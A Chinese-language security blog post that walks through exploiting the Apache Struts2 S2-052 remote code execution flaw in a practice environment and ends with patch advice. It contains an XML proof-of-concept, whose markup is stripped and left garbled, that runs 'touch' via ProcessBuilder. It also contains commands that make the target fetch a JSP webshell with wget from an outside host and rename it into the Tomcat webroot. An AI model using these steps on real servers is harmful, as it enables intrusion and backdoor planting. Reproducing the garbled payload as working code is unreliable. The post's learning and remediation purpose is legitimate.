从0到1学习网络安全 【Apache Struts2(S2-052)远程代码执行漏洞利用及修复】

Apache Struts2 (S2-052)

嗯... 好久没更新了今天给大家分享一下关于Apache Struts2 (S2-052)漏洞的复现及修复建议。
注:今后继续定期更新---实战!


Step1:环境搭建
环境搭建这部分略过,今后所有的环境我都会放到公网,感兴趣的朋友可以直接玩。
从0到1学习网络安全 【Apache Struts2(S2-052)远程代码执行漏洞利用及修复】_第1张图片
漏洞环境.png

以后文章也是以这种答题的形式给各位看官输出。


Step2:漏洞复现
  • 首先,访问漏洞地址 http://xxx.xxx.xxx.xxx/index.jsp
从0到1学习网络安全 【Apache Struts2(S2-052)远程代码执行漏洞利用及修复】_第2张图片
image.png
  • 利用burp 抓包;
    1、修改请求方式为POST
    2、请求头添加字段:Content-Type: application/xml
从0到1学习网络安全 【Apache Struts2(S2-052)远程代码执行漏洞利用及修复】_第3张图片
burp抓包.png

poc:

 
   
     
      0  
       
         
           
             
               
                false  
                0  
                 
                   
                      
                     
                       
                        touch  
                        /usr/local/tomcat/webapps/ROOT/iChina.txt 
                        
                      false 
                     
                    
                   
                     
                      java.lang.ProcessBuilder  
                      start  
                       
                      
                    foo 
                    
                  foo 
                  
                 
                
                
                
              false  
              0  
              0  
              false 
              
            false 
            
           
          
        0 
       
      
     
    
   
      
     
   



该请求核心部分如下(在目标主机的网站根目录创建一个空的iChina.txt文件):

 
touch  
/usr/local/tomcat/webapps/ROOT/iChina.txt 
  

访问已上传的iChina.txt文件

访问上传文件.png
回到开始的题目,要求在网站根目录写入一句话木马,其实说白了就是挂马。

第一反应,应该都是 echo "" >> iChina.jsp将一句话输出重定向至文件,但是由于经过多次实验这个方法行不通。

那么,可以这样:

#利用wget命令将后门直接下载至服务器。
 
wget  
-P
/usr/local/tomcat/webapps/ROOT
https://www.bug1024.cn/iChina.jsp.tar.gz 
  

再这样:

#修改后缀名
 
mv  
/usr/local/tomcat/webapps/ROOT/iChina.jsp.tar.gz 
/usr/local/tomcat/webapps/ROOT/iChina.jsp 
 

访问iChina.jsp页面:

从0到1学习网络安全 【Apache Struts2(S2-052)远程代码执行漏洞利用及修复】_第4张图片
image.png
Step3:修复建议
  • 漏洞影响
    Struts 2.5 – Struts 2.5.12 版本,可能影响到 2.3.33 版本。

  • 解决方案

    1.建议尽快升级到 2.5.13版本。

    2.在不使用时删除 Struts REST插件,或仅限于服务器普通页面和JSONs:

END


由于小编也在学习中,写的不好各位勿喷。
从0到1学习网络安全 【目录】

实战环境地址群内公布!!!

白帽交流群 【简介】
感谢大家支持。

你可能感兴趣的:(从0到1学习网络安全 【Apache Struts2(S2-052)远程代码执行漏洞利用及修复】)